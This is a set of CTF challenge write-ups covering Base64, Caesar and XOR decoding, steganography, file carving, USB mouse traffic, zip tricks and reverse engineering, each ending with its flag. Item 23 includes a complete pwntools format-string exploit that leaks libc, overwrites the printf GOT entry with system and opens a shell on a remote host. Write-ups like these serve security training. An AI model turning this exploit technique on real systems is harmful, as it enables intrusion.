1.Encoding Encoding

Base64-decode it to get the flag!

flag:welcometothepilotcup

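2.Forensic Analysis

Use a script to obtain flag.png, then delete the extra data at the start with WinHex. A PNG file header begins with 89 50.

The file ends with AE 42 60 82.

After removing the useless data we get the flag: b91011fc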
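The trimming step above, as an added example that is not part of the original write-up: it finds the PNG signature (89 50 4E 47 ...), walks the chunks while checking each CRC, and cuts the file right after the IEND chunk, whose last four bytes are AE 42 60 82. The sample input is constructed and the function names are illustrative.

```python
import struct
import zlib

PNG_SIG = bytes.fromhex("89504e470d0a1a0a")  # every PNG starts with these 8 bytes


def carve_png(blob: bytes) -> bytes:
    """Return the first well-formed PNG in blob, without leading or trailing junk."""
    start = blob.find(PNG_SIG)
    while start != -1:
        pos = start + len(PNG_SIG)
        while pos + 12 <= len(blob):
            length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
            end = pos + 12 + length          # length + type + data + CRC
            if end > len(blob):
                break                        # truncated chunk
            (crc,) = struct.unpack(">I", blob[end - 4:end])
            if zlib.crc32(blob[pos + 4:end - 4]) != crc:
                break                        # CRC covers type + data; mismatch = not a PNG
            if ctype == b"IEND":
                return blob[start:end]       # CRC of IEND is always AE 42 60 82
            pos = end
        start = blob.find(PNG_SIG, start + 1)  # false hit, look for the next signature
    raise ValueError("no complete PNG found")


def chunk(ctype: bytes, data: bytes) -> bytes:
    """Build one PNG chunk (used only to construct the sample below)."""
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data)))


def make_sample():
    """Constructed input: a 1x1 greyscale PNG wrapped in junk bytes."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")        # filter byte + one pixel
    png = PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")
    return b"JUNK-HEADER" + png + b"trailing garbage", png


if __name__ == "__main__":
    dirty, clean = make_sample()
    carved = carve_png(dirty)
    print(carved[:2].hex(), carved[-4:].hex(), carved == clean)
```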

3.stegano l

Open the file and view its source; the flag is the string after passwd: steganoI

flag:steganol

4.stegano

Inspect the file with binwalk.

Extract the embedded files with foremost.

This yields the flag.

flag:EORDFFOMFPMA

5.lsb

Open the image in StegSolve and switch to Red plane 3 to get the flag.

flag:ONPGRAMBCICM

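6.Recovery and Decryption

Download the attachment and open the xty.img inside it with DiskGenius.

Choose to recover files.

Open INode00000010 among the recovered files; it contains the ciphertext aWdxNDs3NDFSOzFpa1I1MWliT08waWdx

Decrypt the ciphertext with a script: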

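from base64 import b64decode

# Base64-decode the ciphertext, then try every single-byte XOR key.
b = b64decode("aWdxNDs3NDFSOzFpa1I1MWliT08waWdx")

data = list(b)  # in Python 3 this is a list of ints

for k in range(0, 200):
    key = ""
    for i in range(len(data)):
        key += chr(data[i] ^ k)
    print(key)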

The output line that contains no special characters is the flag.

flag:jdr78472Q82jhQ62jaLL3jdr

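7.File Extraction

Download the attachment and open flag.exe in Notepad. Convert the base64 data inside it into an image.

Open the image in Notepad; the flag is visible at the end of the image.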

flag{068EEF6A7BAD3FDF}

8.Caesar 1

Convert the ciphertext with the Caesar cipher.

The last word is the flag.

flag:moconlfpeold

9.Caesar 2

payload:

a = "0B 33 33 28 20 2E 33 26 70 20 3D 33 39 20 37 33 30 3A 29 28 20 33 32 29 20 31 33 36 29 20 27 2C 25 30 30 29 32 2B 29 20 2D 32 20 3D 33 39 36 20 2E 33 39 36 32 29 3D 72 20 18 2C 2D 37 20 33 32 29 20 3B 25 37 20 2A 25 2D 36 30 3D 20 29 25 37 3D 20 38 33 20 27 36 25 27 2F 72 20 1B 25 37 32 6B 38 20 2D 38 03 20 75 76 7C 20 2F 29 3D 37 20 2D 37 20 25 20 35 39 2D 38 29 20 37 31 25 30 30 20 2F 29 3D 37 34 25 27 29 70 20 37 33 20 2D 38 20 37 2C 33 39 30 28 32 6B 38 20 2C 25 3A 29 20 38 25 2F 29 32 20 3D 33 39 20 38 33 33 20 30 33 32 2B 20 38 33 20 28 29 27 36 3D 34 38 20 38 2C 2D 37 20 31 29 37 37 25 2B 29 72 20 1B 29 30 30 20 28 33 32 29 70 20 3D 33 39 36 20 37 33 30 39 38 2D 33 32 20 2D 37 20 31 25 37 37 32 34 2A 33 25 37 26 37 72"

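ls = []

for i in a.split(' '):
    ls.append(int(i, 16))

print(ls)

# Try every additive shift; chr() raises ValueError when j+i is negative,
# so those shifts are skipped instead of printing a partial line.
for i in range(-100, 100):
    try:
        print(''.join(chr(j + i) for j in ls))
    except ValueError:
        pass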

The flag is the shaded part in the figure.

10.ascii

>>> l=[84,104,101,32,115,111,108,117,116,105,111,110,32,105,115,58,32,105,104,98,100,115,105,101,111, 112,100,99,110]
>>> a=''
>>> for i in l:
...  a+=chr(i)
...
>>> a
'The solution is: ihbdsieopdcn'

flag:ihbdsieopdcn

11.forensics

Inspect the file with binwalk.

Extract the embedded files with foremost.

Looking through the useful output, the extracted image is the flag.

flag:360HA360

12.usb

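This turns out to be traffic analysis of the USB protocol, and we find a Logitech device.

Looking at the data, we find that it represents mouse movement; export the data to a.txt.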

00:ff:00:00
00:ff:00:00
00:ff:00:00
00:fd:00:00
00:ff:00:00
00:ff:00:00
00:fe:ff:00
00:fd:00:00
00:fb:00:00
00:fc:00:00
00:fb:00:00
00:fc:00:00
00:fc:ff:00
00:fe:00:00
00:fe:ff:00
00:fe:00:00
00:ff:00:00
00:fe:ff:00
00:ff:ff:00
01:00:00:00

Then we convert the data to coordinates:

awk -F: 'function comp(v){if(v>127)v-=256;return v}{x+=comp(strtonum("0x"$2));y+=comp(strtonum("0x"$3))}$1=="01"{print x,y}' a.txt > b.txt

Once we have the coordinates, plot them with gnuplot to reveal the flag.

The flag is tHe_CAT_is_the_CULpRiT
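The same conversion as the awk one-liner, written out as an added example (not code from the original write-up). It assumes the 4-byte report layout the awk fields imply: byte 0 is the button state, bytes 1 and 2 are signed X and Y displacements. SAMPLE is the excerpt of a.txt shown above; the function names are illustrative.

```python
# Excerpt of a.txt from this write-up, one 4-byte report per token.
SAMPLE = """
00:ff:00:00 00:ff:00:00 00:ff:00:00 00:fd:00:00 00:ff:00:00
00:ff:00:00 00:fe:ff:00 00:fd:00:00 00:fb:00:00 00:fc:00:00
00:fb:00:00 00:fc:00:00 00:fc:ff:00 00:fe:00:00 00:fe:ff:00
00:fe:00:00 00:ff:00:00 00:fe:ff:00 00:ff:ff:00 01:00:00:00
""".split()


def to_signed(byte: int) -> int:
    """Interpret one report byte as a two's-complement 8-bit displacement."""
    return byte - 256 if byte > 127 else byte


def trace_clicks(reports):
    """Accumulate relative motion and keep the cursor position for every
    report whose left-button bit is set (the awk filter tests $1 == "01")."""
    x = y = 0
    points = []
    for line in reports:
        # Tolerate stray spaces around the separators, as in a rough export.
        fields = [int(f, 16) for f in line.replace(" ", "").split(":") if f]
        if len(fields) < 3:
            continue  # not a full report
        buttons, dx, dy = fields[0], to_signed(fields[1]), to_signed(fields[2])
        x += dx
        y += dy
        if buttons & 0x01:
            points.append((x, y))
    return points


def to_gnuplot(points) -> str:
    """Format points as 'x y' lines, the layout written to b.txt."""
    return "\n".join(f"{x} {y}" for x, y in points)


if __name__ == "__main__":
    print(to_gnuplot(trace_clicks(SAMPLE)))
```

The excerpt contains a single button-down report, so it produces one point; the full capture yields the stroke coordinates that gnuplot draws.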

14.MasterofZip-Middle

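Brute-forcing yields the password!

This gives a pseudo-encrypted archive; patch it to 00 with WinHex.

This gives flag.png; inspecting it in WinHex shows that its height is too small.

After adjusting the height we finally get the flag.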

flag{b2599e17dd7c48ae62d008a1a145cc6d9928d4ac}
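The pseudo-encryption fix done by hand in WinHex, as an added example that is not part of the original write-up: a ZIP is "pseudo-encrypted" when bit 0 of the general-purpose flag word is set in its headers although the payload is not encrypted, so clearing that bit makes it readable again. The sample archive is constructed and the function names are illustrative.

```python
import io
import struct
import zipfile


def flag_offsets(data: bytes):
    """Yield the offset of the general-purpose flag word in every central
    directory header and in the local header it points to."""
    eocd = data.rfind(b"PK\x05\x06")
    if eocd < 0:
        raise ValueError("end-of-central-directory record not found")
    count, _size, pos = struct.unpack_from("<HII", data, eocd + 10)
    for _ in range(count):
        if data[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError("bad central directory header")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        (local_off,) = struct.unpack_from("<I", data, pos + 42)
        yield pos + 8          # flag word in the central header
        yield local_off + 6    # flag word in the local header
        pos += 46 + name_len + extra_len + comment_len


def set_encrypted_bit(data: bytes, on: bool) -> bytes:
    """Set or clear bit 0 ("encrypted") of every flag word; payload untouched."""
    buf = bytearray(data)
    for off in flag_offsets(data):
        buf[off] = buf[off] | 0x01 if on else buf[off] & 0xFE
    return bytes(buf)


def make_sample() -> bytes:
    """Constructed sample: a plain archive whose headers are marked encrypted."""
    mem = io.BytesIO()
    with zipfile.ZipFile(mem, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("flag.txt", "constructed sample content")
    return set_encrypted_bit(mem.getvalue(), True)


def read_member(data: bytes, name: str) -> bytes:
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)


if __name__ == "__main__":
    fake = make_sample()
    print(read_member(set_encrypted_bit(fake, False), "flag.txt"))
```

Clearing the bit only helps when the data really is unencrypted; on a genuinely encrypted member the extracted bytes fail the CRC check.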

15.Packet Analysis-Easy

Export all HTTP objects.

This gives flag.php, which is the flag.

flag{3eyufhnj87}

16.easyelf

Just solve it with angr.

flag{Thunk_c0des_xoR_thr3e_de4l}

22.giao

payload:

This gives flag{5f284498df}

23.easy_fmt

from pwn import *

context.log_level = 'debug'

p = process('./easy_fmt')
e = ELF('./easy_fmt')
libc=ELF("/libc64.so")
p=remote("39.104.173.175","15502")

# Leak the libc address of read through its GOT entry.
get_libc_payload = "%7$s".ljust(8, 'a')+p64(e.got['read'])
p.send(get_libc_payload)
read_libc = u64(p.recv(6)+'\x00\x00')
print hex(read_libc)

begin_libc = read_libc-libc.symbols['read']
print hex(begin_libc)

# Despite the variable name, this is the address of system.
one_gadget_libc = begin_libc+libc.symbols['system']
print hex(one_gadget_libc)

# Low three bytes of the target, each paired with its byte offset.
a1 = (one_gadget_libc & 0xff0000) >> 16
a2 = (one_gadget_libc & 0xff00) >> 8
a3 = one_gadget_libc & 0xff
print hex(a1)+hex(a2)+hex(a3)

point1 = [2, a1]
point2 = [1, a2]
point3 = [0, a3]


def swap(p1, p2):
    for i in range(2):
        t = p1[i]
        p1[i] = p2[i]
        p2[i] = t


# Sort ascending by byte value; compare the current contents of the points,
# not the original a1/a2/a3, which are stale after the first swap.
if point1[1] > point2[1]:
    swap(point1, point2)
if point1[1] > point3[1]:
    swap(point1, point3)
if point2[1] > point3[1]:
    swap(point2, point3)
print point1+point2+point3

# Turn the sorted values into increments of the printed-character count.
point2[1] = point2[1]-point1[1]
point3[1] = point3[1]-point2[1]-point1[1]
print point1+point2+point3

write_got_payload = '%'+str(point1[1])+'c'+'%12$hhn'
write_got_payload += '%'+str(point2[1])+'c'+'%13$hhn'
write_got_payload += '%'+str(point3[1])+'c'+'%14$hhn'
write_got_payload = write_got_payload.ljust(48, 'a')
write_got_payload += p64(e.got['printf']+point1[0])
write_got_payload += p64(e.got['printf']+point2[0])
write_got_payload += p64(e.got['printf']+point3[0])
p.send(write_got_payload)

sleep(1)
p.sendline("/bin/sh\x00")
p.interactive()

This gives flag{279920429c}

24.EasyRE

flag{Let_Us_st4rt_R3v3rSe}

25.EASYReverse

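Inspecting the program in IDA shows a base64 implementation without a lookup table, so a script was used to recover the first part.

The last three bytes were pieced together by hand to get the correct flag.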

flag{JSe3psfxa2X96USgM58346t4Ta87uRQy}


